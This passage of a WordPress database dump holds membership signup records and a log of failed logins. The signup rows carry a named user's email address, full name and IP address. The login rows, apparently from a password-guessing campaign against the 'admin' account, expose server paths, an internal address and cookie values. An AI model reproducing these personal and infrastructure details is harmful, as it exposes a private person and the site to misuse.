INSERT INTO `wp_arm_entries` VALUES (1,'nimya@vividhity.com','a','a:2:{s:7:\"browser\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36\";s:13:\"http_referrer\";s:42:\"https://gopalak.in/2051-2/?restricted=page\";}','171.76.80.77','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36','a:24:{s:6:\"action\";s:37:\"arm_membership_setup_form_ajax_action\";s:15:\"form_random_key\";s:12:\"1_eF51KQUgHw\";s:8:\"setup_id\";s:1:\"1\";s:17:\"arm_user_old_plan\";s:1:\"0\";s:26:\"arm_is_user_logged_in_flag\";s:1:\"0\";s:24:\"arm_front_plan_skin_type\";s:5:\"skin3\";s:17:\"subscription_plan\";s:1:\"1\";s:13:\"arm_plan_type\";s:4:\"free\";s:10:\"user_login\";s:5:\"nimya\";s:10:\"first_name\";s:5:\"nimya\";s:9:\"last_name\";s:4:\"jose\";s:10:\"user_email\";s:19:\"nimya@vividhity.com\";s:10:\"arm_action\";s:13:\"please-signup\";s:11:\"redirect_to\";s:32:\"https://gopalak.in/edit_profile/\";s:7:\"isAdmin\";s:1:\"0\";s:12:\"referral_url\";s:40:\"https://s10333402.saturnwp.link/aboutus/\";s:11:\"arm_form_id\";s:3:\"101\";s:14:\"form_filter_kp\";s:1:\"1\";s:14:\"form_filter_st\";s:10:\"1680003515\";s:15:\"arm_nonce_check\";s:10:\"5097d8f07f\";s:8:\"8r9rn644\";s:0:\"\";s:25:\"arm_selected_payment_mode\";s:0:\"\";s:26:\"arm_selected_payment_cycle\";i:0;s:14:\"setup_redirect\";s:18:\"https://gopalak.in\";}',101,31,1,0,0,0,'2023-03-28 07:30:33'),(2,'nimya@vividhity.com','a','a:2:{s:7:\"browser\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36\";s:13:\"http_referrer\";s:42:\"https://gopalak.in/2051-2/?restricted=page\";}','171.76.80.77','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36','a:14:{s:6:\"action\";s:37:\"arm_membership_setup_form_ajax_action\";s:15:\"form_random_key\";s:12:\"1_HNc8SUcQ9J\";s:8:\"setup_id\";s:1:\"1\";s:17:\"arm_user_old_plan\";s:1:\"1\";s:26:\"arm_is_user_logged_in_flag\";s:1:\"1\";s:24:\"arm_front_plan_skin_type\";s:5:\"skin3\";s:17:\"subscription_plan\";s:1:\"1\";s:13:\"arm_plan_type\";s:4:\"free\";s:24:\"arm_payment_cycle_plan_1\";s:1:\"0\";s:15:\"payment_cycle_1\";s:1:\"0\";s:8:\"qv2phsgg\";s:0:\"\";s:25:\"arm_selected_payment_mode\";s:0:\"\";s:26:\"arm_selected_payment_cycle\";i:0;s:14:\"setup_redirect\";s:18:\"https://gopalak.in\";}',0,31,1,0,0,0,'2023-03-28 07:31:32');
/*!40000 ALTER TABLE `wp_arm_entries` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_arm_fail_attempts`
--

DROP TABLE IF EXISTS `wp_arm_fail_attempts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_arm_fail_attempts` (
  `arm_fail_attempts_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `arm_user_id` bigint(20) NOT NULL,
  `arm_fail_attempts_detail` text DEFAULT NULL,
  `arm_fail_attempts_ip` varchar(200) DEFAULT NULL,
  `arm_is_block` int(1) NOT NULL DEFAULT 0,
  `arm_fail_attempts_datetime` datetime NOT NULL DEFAULT '1970-01-01 00:00:00',
  `arm_fail_attempts_release_datetime` datetime NOT NULL DEFAULT '1970-01-01 00:00:00',
  PRIMARY KEY (`arm_fail_attempts_id`)
) ENGINE=InnoDB AUTO_INCREMENT=95824 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_arm_fail_attempts`
--

LOCK TABLES `wp_arm_fail_attempts` WRITE;
/*!40000 ALTER TABLE `wp_arm_fail_attempts` DISABLE KEYS */;
INSERT INTO `wp_arm_fail_attempts` VALUES (93668,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f+pfUCd0FJAwMpAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41674\";s:11:\"REMOTE_ADDR\";s:11:\"185.2.4.103\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744741878.0079999;s:12:\"REQUEST_TIME\";i:1744741878;}}','185.2.4.103',0,'2025-04-16 00:01:19','1970-01-01 00:00:00'),(93669,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f+qLQCd0FJAwRoAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:4:\"9464\";s:11:\"REMOTE_ADDR\";s:11:\"78.135.87.2\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744742580.8219349;s:12:\"REQUEST_TIME\";i:1744742580;}}','78.135.87.2',0,'2025-04-16 00:13:02','1970-01-01 00:00:00'),(93670,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f+rjoCd0FJAwb3Ag==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41250\";s:11:\"REMOTE_ADDR\";s:14:\"103.124.95.168\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744743995.030406;s:12:\"REQUEST_TIME\";i:1744743995;}}','103.124.95.168',0,'2025-04-16 00:36:36','1970-01-01 00:00:00'),(93671,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f+sPKsTkilAwNhAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40300\";s:11:\"REMOTE_ADDR\";s:13:\"63.250.38.213\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744744691.158709;s:12:\"REQUEST_TIME\";i:1744744691;}}','63.250.38.213',0,'2025-04-16 00:48:12','1970-01-01 00:00:00'),(93672,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f+s7BCJksvAwOYAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40884\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.126.98\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744745392.7252181;s:12:\"REQUEST_TIME\";i:1744745392;}}','198.54.126.98',0,'2025-04-16 00:59:54','1970-01-01 00:00:00'),(93673,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f+tm0o1mZ1AwOSAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46044\";s:11:\"REMOTE_ADDR\";s:14:\"208.107.66.243\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744746093.732933;s:12:\"REQUEST_TIME\";i:1744746093;}}','208.107.66.243',0,'2025-04-16 01:11:35','1970-01-01 00:00:00'),(93674,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f+uSIo1mZ1AwVFAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37054\";s:11:\"REMOTE_ADDR\";s:13:\"48.217.90.135\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744746786.459888;s:12:\"REQUEST_TIME\";i:1744746786;}}','48.217.90.135',0,'2025-04-16 01:23:08','1970-01-01 00:00:00'),(93675,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f+u9asag9gAwNyAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45078\";s:11:\"REMOTE_ADDR\";s:13:\"91.206.201.66\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744747478.598417;s:12:\"REQUEST_TIME\";i:1744747478;}}','91.206.201.66',0,'2025-04-16 01:34:40','1970-01-01 00:00:00'),(93676,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f+vosQYhaTAwPrAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44614\";s:11:\"REMOTE_ADDR\";s:13:\"185.104.44.61\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744748171.6837759;s:12:\"REQUEST_TIME\